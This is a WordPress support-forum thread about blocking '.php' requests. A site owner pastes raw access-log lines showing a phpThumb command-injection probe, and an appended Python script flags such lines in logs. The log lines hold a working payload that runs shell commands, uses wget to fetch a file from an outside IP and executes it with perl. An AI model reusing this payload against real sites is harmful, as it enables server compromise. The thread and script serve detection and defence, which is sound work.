WordPress.org


Rewrite all URLs with php extension (7 posts)

  1. arachma1
    Member
    Posted 2 years ago #

    Hello Everybody,

    I just played around with the "Permalink" settings and a few URL rewrite plugins (Easy url rewrite, Auto URL, etc.) but none of them fits the one I am looking for.

    Maybe I missed something fundamental, but what I want is to rewrite all URLs containing ".php", including everything in the admin areas. For instance, wp-login.php, wp-admin/edit.php, etc., to be login.html, admin/edit.html, etc. How could I easily do that?

    I am aware that I will possibly need to do the rewrite on my Nginx as well. But I don't think there will be an issue as long as I know the URL mappings.

    Thanks in advance for your help.

    Kind regards,

    Anto

  2. Jorge
    Member
    Posted 2 years ago #

  3. arachma1
    Member
    Posted 2 years ago #

    Thanks Jorge,

    But that does not answer my question. What you pointed out (I think) can easily be achieved using the Permalink function.

    Maybe I need to explain in more detail on what I want to achieve.

    My main intention is to block any request for URLs containing ".php", to avoid any possible exploits. For that, there should not be any links on my website containing ".php". So what I need is a function in my WordPress to automatically change those URLs before the page is sent to the browser. I can manually change them in every PHP script, but then I will have to redo them on every upgrade.

    Kind regards,

    Anto

  4. Jorge
    Member
    Posted 2 years ago #

    Sorry, I meant, keep it as-is. I wouldn't recommend obfuscating the permalink structure in the wp-admin area.

    Is there a particular exploit or do you know of one that an attacker might use knowing the filetype? If so, the core developers would benefit from knowing any vulnerabilities that present themselves.

  5. arachma1
    Member
    Posted 2 years ago #

    I have only had my WordPress running since this morning :) So I don't know the exact vulnerabilities in it. But since I have had it running, my web server has been bombarded with requests like the ones below, which I am quite sure are not requests from normal users:

    _|94.23.225.138|-|27/Dec/2011:08:10:41 +0100|GET|/wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9|HTTP/1.1|410|152|-|Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0|-
    _|94.23.225.138|-|27/Dec/2011:08:10:41 +0100|GET|/wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9|HTTP/1.1|410|152|-|Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0|-
    _|94.23.225.138|-|27/Dec/2011:08:10:41 +0100|GET|/wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9|HTTP/1.1|410|152|-|Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0|-

  6. Jorge
    Member
    Posted 2 years ago #

    That looks like an attacker might be trying to exploit the TimThumb.php script in your theme.

    What is the URL of your install?

  7. arachma1
    Member
    Posted 2 years ago #

    Did you mean my site using WordPress? If so, it is http://myweblog.info, which is hosted with a VPS provider somewhere in Germany. But it only accepts requests from my home IP address at the moment, until I find a good solution to block any requests containing ".php".
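
Added example, not part of the thread or of WordPress: a small triage script for access-log lines in the pipe-delimited layout posted above, flagging `.php` requests whose decoded query string carries shell metacharacters. The field order is inferred from the posted lines, the function names are hypothetical, and the sample lines are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in the thread's pipe-delimited layout
# (documentation IPs, shortened payload); not copied from the post.
SAMPLE = [
    "_|192.0.2.10|-|27/Dec/2011:08:10:41 +0100|GET|/wp-content/themes/x/phpthumb/"
    "phpThumb.php?src=file.jpg&fltr[]=blur|9%20fail.jpg%20;%20ls%20-l%20/tmp;"
    "&phpThumbDebug=9|HTTP/1.1|410|152|-|Mozilla/5.0|-",
    "_|192.0.2.20|-|27/Dec/2011:08:11:02 +0100|GET|/wp-login.php|HTTP/1.1|200|2301|-|Mozilla/5.0|-",
    "_|192.0.2.20|-|27/Dec/2011:08:11:05 +0100|GET|/?s=cats%20and%20dogs|HTTP/1.1|200|5120|-|Mozilla/5.0|-",
]

# Shell separators and substitutions that have no place in a thumbnail
# filter argument. A lone "|" is not listed: "blur|9" is a normal value.
SHELL_META = re.compile(r"[;`]|\$\(|&&|\|\|")


def parse(line):
    """Split one log line; the URI may itself contain '|' characters."""
    parts = line.rstrip("\n").split("|")
    if len(parts) < 12:
        return None  # not in the assumed 12-field layout
    # Five fixed fields on the left, six on the right; the rest is the URI.
    _, ip, _, ts, method = parts[:5]
    proto, status, size, referer, agent, _ = parts[-6:]
    return {"ip": ip, "time": ts, "method": method, "uri": "|".join(parts[5:-6]),
            "proto": proto, "status": status, "size": size, "agent": agent}


def is_injection_probe(rec):
    """True if a .php request carries shell metacharacters in its query."""
    path, _, query = rec["uri"].partition("?")
    if not query or not path.lower().endswith(".php"):
        return False
    return bool(SHELL_META.search(unquote(query)))


def flagged(lines):
    """Return (ip, path, status) for every line that looks like a probe."""
    hits = []
    for rec in filter(None, map(parse, lines)):
        if is_injection_probe(rec):
            hits.append((rec["ip"], rec["uri"].partition("?")[0], rec["status"]))
    return hits


if __name__ == "__main__":
    for hit in flagged(SAMPLE):
        print(*hit)
```

The status column in each hit shows whether the server already refused the request, and the path shows which script was probed, so you can check whether that file exists in your install.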

Topic Closed

This topic has been closed to new replies.
